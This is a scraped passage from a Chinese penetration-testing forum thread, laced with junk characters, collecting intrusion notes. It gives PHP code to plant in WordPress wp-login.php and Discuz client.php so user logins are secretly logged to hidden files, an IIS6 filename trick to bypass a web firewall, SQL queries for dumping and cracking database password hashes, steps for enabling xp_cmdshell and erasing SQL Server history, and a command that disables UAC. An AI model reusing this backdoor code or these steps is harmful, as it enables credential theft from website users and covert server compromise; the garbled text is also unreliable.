$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;. g9 V( W: \" N+ S
$txt=$txt.”\r\n”;
# t$ c$ L# S9 m% {& Y8 c) _* \if($log_user&&$log_pwd&&$log_ip){
# K/ q1 s$ c$ |; g0 \4 T1 T@fwrite(fopen(‘pwd.txt’,”a+”),$txt);1 q/ e9 f7 q. ]
}
  p0 |7 `/ U" Y, e6 W$ J% y0 l1 t( ]当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。& Y" z: ~, X, e/ q
就是搜索case ‘login’
5 Z# C, @) R2 b  L- ]在它下面直接插入即可,记录的密码生成在pwd.txt中,* |& w) i% |/ P% W
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录: x5 {/ I1 ?2 L7 V8 b2 k6 A
利用II6文件解析漏洞绕过安全狗代码:
: A% t& O: s6 j6 ^2 s;antian365.asp;antian365.jpg
5 o5 W! w) L: t2 _, i# f# p4 H
( ?- {. r1 ]0 d- K5 d" a各种类型数据库抓HASH破解最高权限密码!9 N# t: o/ I5 _) [, o7 ~
1.sql server2000
% T5 i# c6 P' C+ mSELECT password from master.dbo.sysxlogins where name='sa'
& x6 v  S: C/ y: |& W' C( V0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
( o0 k& V6 `9 s1 [2FD54D6119FFF04129A1D72E7C3194F7284A7F3A+ b! ^* |( I/ N. b6 S9 @( F
) w6 F; c1 r1 f
0×0100- constant header( Z. k. i1 y# |3 `  [* g9 b; ~
34767D5C- salt
6 B- k' `* ]% O0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
- @+ B4 W" E3 c& R5 o2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
8 _, y& \) Q* D9 `crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
8 T) @% L1 n5 y3 C% bSQL server 2005:-
: \0 H( _5 s2 [6 `' j! x* x/ h+ V* T/ iSELECT password_hash FROM sys.sql_logins where name='sa'
5 j8 g) ^5 v, \& ]/ e0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
, B, H" b2 u6 K$ x' c0×0100- constant header9 G* t5 c+ W/ J; v1 `5 i
993BF231-salt/ w8 C+ H1 T! b2 I& k2 b3 ^
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
; {& u; E6 Z: @2 `( d+ g) e6 q7 w, hcrack case sensitive hash in cain, try brute force and dictionary based attacks.! U9 l1 ~+ t. C5 r9 }- Q1 v

# ~" f" j! N4 \4 f* b1 X7 y: ]update:- following bernardo’s comments:-1 ?8 N  T* e. @# f- A# o
use function fn_varbintohexstr() to cast password in a hex string.
4 ]9 {1 [# H' de.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins2 J9 U6 R: t/ y1 f- p) P
0 q+ R) v! _# j  n+ J
MYSQL:-
9 @; }; y$ \0 m3 n4 ~5 L. s7 W" Q( [
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
0 [% O8 p/ r  R" y$ H
3 f  _! Y) T6 `3 J" `! c*mysql  < 4.1
' d5 t; i9 G- \3 v" r& u. k# _  R# S
mysql> SELECT PASSWORD(‘mypass’);
+ F. j) B* x) ^2 z& v+——————–+6 G. X% I9 q5 d& ]
| PASSWORD(‘mypass’) |* _) |0 B) z. W3 {
+——————–+' ^1 q' g; r7 _
| 6f8c114b58f2ce9e   |; z" E2 h, {4 ]: p7 V
+——————–+
" y8 [- P: a! R! H4 H, U
: V) _% V% y" Y+ H% D% C: T*mysql >=4.1
" F2 h; Q; `, V- c8 r7 B6 V, e+ V* \2 N
mysql> SELECT PASSWORD(‘mypass’);' Q% e" h% u3 |8 \6 B
+——————————————-+1 m" U3 |$ Q: O# m$ C, o/ d+ N
| PASSWORD(‘mypass’)                        |
  O1 K3 U1 q" t' h5 O3 q+——————————————-+
! E& m+ `* s$ \| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |: H( n% ?, ~# y" K: `$ o
+——————————————-+" B/ S! A: w' n2 O5 N( y
* K$ ?; m6 h  M2 \  s3 F6 s" W" H9 |
Select user, password from mysql.user
! K" u4 ?3 `4 @  ]$ ^6 @% \The hashes can be cracked in ‘cain and abel’
' h  G6 Q0 R7 K: h( l. L; j
5 l  F! r; `* |3 Q% S6 w$ iPostgres:-! t, r" ^; z1 }. s0 [
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
( o7 Z$ z4 \/ o$ Q( P# I4 G" zselect usename, passwd from pg_shadow;0 X! C+ o+ h9 m) [, w( S# S/ N
usename      |  passwd- x/ y5 P6 f6 s" O  u, }
——————+————————————-' J$ x* l! o8 z# s7 Q' t
testuser            | md5fabb6d7172aadfda4753bf0507ed4396* U5 |) |, K2 z8 L
use mdcrack to crack these hashes:-6 D4 h0 ^# V; n9 R' n2 W7 Z1 {
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
( n4 C) H, @$ u" }* e8 U1 l0 l0 G9 I' `( `6 N0 q5 P0 H
Oracle:-5 p& k" ~2 }4 X9 {+ l
select name, password, spare4 from sys.user$! @  j# g0 z) S1 A" ?& A
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g' v4 D" ?4 w9 x1 Y
More on Oracle later, i am a bit bored….
4 x- V9 z' z6 e* m# a( `" {1 Y# t, y: ]5 x0 K9 }

6 L( c- {+ f% s( d" k+ k5 `! |在sql server2005/2008中开启xp_cmdshell& i( p7 t' G, p4 X. N' ~8 k
-- To allow advanced options to be changed.; Q& _0 W4 R& E% t
EXEC sp_configure 'show advanced options', 1
! e. O' Q: l& K/ p9 i; fGO' p$ [0 j- X9 U4 j* S
-- To update the currently configured value for advanced options.
( t( F2 c. e7 t7 l" V* p: |RECONFIGURE0 X8 J: h: e0 n- T0 n) t
GO1 h' a7 y" \" Y) D
-- To enable the feature.# E) F  m* N1 }3 j& x
EXEC sp_configure 'xp_cmdshell', 1* f* M% C; @, T: A5 l0 s( M8 W# X
GO4 G! d$ h0 N) s7 y/ j
-- To update the currently configured value for this feature.
( o7 P; P2 O$ G2 \$ kRECONFIGURE
9 l6 E$ v6 o( t  P- n$ n( J0 r- eGO; _. H, H4 J/ Z6 h  K. V/ K
SQL 2008 server日志清除,在清楚前一定要备份。% W' x( x* x0 k* M" s
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
, A& _) y, t& E' `7 T: w- D9 WX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
9 s2 ~* w, W- o% l0 W* }8 c5 t) W* {1 i5 H7 M, n: a5 c% m
对于SQL Server 2008以前的版本:
5 N  p$ x6 u! k/ h& ASQL Server 2005:
1 q) q6 H% D+ n6 u删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
5 t7 P- V: l7 X) |1 SSQL Server 2000:) X$ ?: X& `8 _
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。: @# r4 e4 m  [- r

- a+ }8 N% u% B  M, s/ ]本帖最后由 simeon 于 2013-1-3 09:51 编辑& b3 W: D: f" M9 m: ~" [
% q1 @; ]9 Z3 R  ~* w

9 D) ?$ Z, m( f) j. Mwindows 2008 文件权限修改* j! z. e, Y6 u3 b8 D/ {3 n
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
3 ?! ^7 X1 y# N: R7 k2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
& F$ K- @; W4 d2 U0 F一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,/ A0 w; A2 R  u6 P+ h, Z# a

6 W4 B5 e5 l  t6 K/ \Windows Registry Editor Version 5.00
! {: X" f/ z* i; Y$ q2 ^  ^$ S[HKEY_CLASSES_ROOT\*\shell\runas]! p* {3 Q% H; W5 z
@="管理员取得所有权"
0 w6 O2 b& m# w"NoWorkingDirectory"=""
- ]  ~+ [" A* V  c% n3 p5 y[HKEY_CLASSES_ROOT\*\shell\runas\command]/ I; F+ L9 y& Z% `
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F". |1 l# {1 o, Q# Y( S5 s
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( Y. [. e3 H  u  C  u: }9 o[HKEY_CLASSES_ROOT\exefile\shell\runas2]
" {% t3 a7 y# Y8 l, v@="管理员取得所有权"  }! O$ o7 X/ Y
"NoWorkingDirectory"=""
4 R& y; K# r1 v/ Y  s[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]9 L) I( v6 V& |2 S7 t6 I
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 D9 ]% [( B' w8 N& B) A3 X
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. G2 Z7 R- M6 L9 F0 A, _$ i3 B; _# _8 U+ ^
[HKEY_CLASSES_ROOT\Directory\shell\runas]- p$ U8 u! s1 R
@="管理员取得所有权"8 V$ j2 k/ a; N; \% @6 c
"NoWorkingDirectory"=""
% A" a) w* Y# Z* g* T6 P[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
+ d3 r  y2 |: y0 K. \  s" S@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"1 h8 B4 ]$ c  B5 f' H
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"; M% {6 X, r1 @( z: K* E
8 H8 b! |( k* V9 w5 p% e& j
4 ~) n7 P. e. ~2 D- S/ N% T2 ]' c
win7右键“管理员取得所有权”.reg导入/ y4 N  M' v) }: s4 \' g' F
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,8 L0 }& C/ x( D, ]! \
1、C:\Windows这个路径的“notepad.exe”不需要替换
$ R$ D: [" J+ O9 x& `- s. ]% p8 e* |3 W0 J2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
$ g+ D9 v8 S+ c' O3、四个“notepad.exe.mui”不要管
/ [1 W3 {4 ^" Q- ^: G4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和: @, b3 g3 ?. n. \
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
% N) c6 l. w8 z* u/ S替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
: u! G  Q$ t2 m. ]! u0 J+ D替换完之后回到桌面,新建一个txt文档打开看看是不是变了。3 k6 x' T% D: [8 W1 f* o* U
windows 2008中关闭安全策略: , S: u9 t4 c. \! y0 g1 z0 h
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
6 _, N1 H0 M* n2 f! C8 B$ _修改uc_client目录下的client.php 在
0 q1 H# t% a" K5 J: Dfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
/ s0 p* p! w& c8 y5 K下加入如上代码,在网站./data/cache/目录下自动生成csslog.php) f( r+ g* _/ p( G; X
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
! z# l& k* G5 K" z) {( Fif(getenv('HTTP_CLIENT_IP')) {
* i  M* y, v- I* z$ b2 o$onlineip = getenv('HTTP_CLIENT_IP');: T5 P* O7 J8 T, Y2 c
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
7 `, Y3 G2 K: z" j& i8 C$onlineip = getenv('HTTP_X_FORWARDED_FOR');* C" Y6 _$ w# h  u8 i
} elseif(getenv('REMOTE_ADDR')) {/ n! x" F. R$ i+ n9 x+ W+ ]
$onlineip = getenv('REMOTE_ADDR');6 ~/ e7 h+ Z: }0 x+ U2 G* P! X
} else {
' q8 U3 O- W$ x) H0 u$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
2 E1 U3 U) C* r+ o, `7 R$ y2 O}% _( i5 i7 Q( o( _6 D- i  ]4 W9 O
     $showtime=date("Y-m-d H:i:s");6 u1 w( s. n" ~0 Y7 ~  Z' J
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";+ ?1 y+ \) q2 Z* P* N
    $handle=fopen('./data/cache/csslog.php','a+');( W& H6 M+ }' v' P+ p5 i
    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2